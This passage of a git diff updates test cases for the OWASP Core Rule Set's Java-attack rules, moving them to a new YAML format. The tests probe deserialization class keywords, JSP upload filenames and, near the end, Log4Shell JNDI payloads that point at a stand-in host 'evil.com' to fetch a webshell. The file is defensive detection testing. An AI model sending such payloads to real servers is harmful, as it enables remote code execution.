"application/x-www-form-urlencoded" - Cookie: test=org.apache.commons - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-400 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.apache.commons + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 400 desc: "Cookie name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.apache.commons=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-401 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.apache.commons=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 401 desc: "Request header test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.apache.commons - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-402 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.apache.commons + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 402 desc: "XML attribute value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-403 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 403 desc: "XML element value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-404 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 404 desc: "Nested XML element value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-405 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 405 desc: "Content-Type text/plain includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-406 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 406 desc: "Content-Type application/json arg value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"org.apache.commons\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-407 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"org.apache.commons\"}" + output: + log: + expect_ids: [944130] + - test_id: 407 desc: "Content-Type application/json arg name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"org.apache.commons\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-408 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"org.apache.commons\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 408 desc: "Argument test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-409 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 409 desc: "Argument name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-410 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA=test" + output: + log: + expect_ids: [944130] + - test_id: 410 desc: "Cookie test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.omg.CORBA - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-411 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.omg.CORBA + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 411 desc: "Cookie name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.omg.CORBA=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-412 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.omg.CORBA=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 412 desc: "Request header test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.omg.CORBA - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-413 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.omg.CORBA + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 413 desc: "XML attribute value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-414 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 414 desc: "XML element value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-415 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 415 desc: "Nested XML element value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-416 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 416 desc: "Content-Type text/plain includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-417 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 417 desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"org.omg.CORBA\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-418 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"org.omg.CORBA\"}" + output: + log: + expect_ids: [944130] + - test_id: 418 desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"org.omg.CORBA\": \"test\"}" - output: - log_contains: "id \"944130\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"org.omg.CORBA\": \"test\"}" + output: + log: + expect_ids: [944130] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml index d380970..a1f312d 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml @@ -1,159 +1,157 @@ --- meta: author: "lifeforms, azurit" - description: None - enabled: true - name: 944140.yaml +rule_id: 944140 tests: - - test_title: 944140-1 + - test_id: 1 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "944140" - - test_title: 944140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [944140] + - test_id: 2 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jsp - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload1" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload1" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 3 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X_Filename: B.jsp - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload2" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: B.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload2" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 4 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: a.jspx - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload3" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: a.jspx + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload3" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 5 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jsp.. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload4" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload4" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 6 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jspx.. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jspx.. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 7 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: foo.jspx... - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.jspx... + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 8 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X_Filename: foo.jspx. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload7" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: foo.jspx. + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload7" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 9 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: foo.html - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload8" - version: "HTTP/1.1" - output: - no_log_contains: id "944140" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: foo.html + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload8" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [944140] diff --git a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml index 8e081af..47f48e5 100644 --- a/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml +++ b/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml @@ -1,438 +1,436 @@ --- -# NOTE: Please keep these tests in sync with 944151.yaml. -# 944151 should detect the same things as 944150. +# NOTE: Please keep these tests in sync with 944151.yaml and 944152.yaml. +# 944150 should detect the same things as 944151 and 944152. meta: author: "dune73, Max Leske, azurit" - enabled: true - name: "944150.yaml" - description: "Description" +rule_id: 944150 tests: - - test_title: 944150-1 + - test_id: 1 desc: Log4J exploit on arg foo stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent" - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: foo=${jndi:ldap://evil.com/webshell} - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-2 + - input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/x-www-form-urlencoded + method: POST + port: 80 + uri: "/post" + data: foo=${jndi:ldap://evil.com/webshell} + version: "HTTP/1.1" + output: + log: + expect_ids: [944150] + - test_id: 2 desc: Log4J exploit on User-Agent stages: - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Accept: "*/*" - Host: localhost - User-Agent: "OWASP CRS test agent ${jndi:ldap://evil.com/webshell}" - method: GET - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "944150" - - test_title: 944150-3 + - input: + 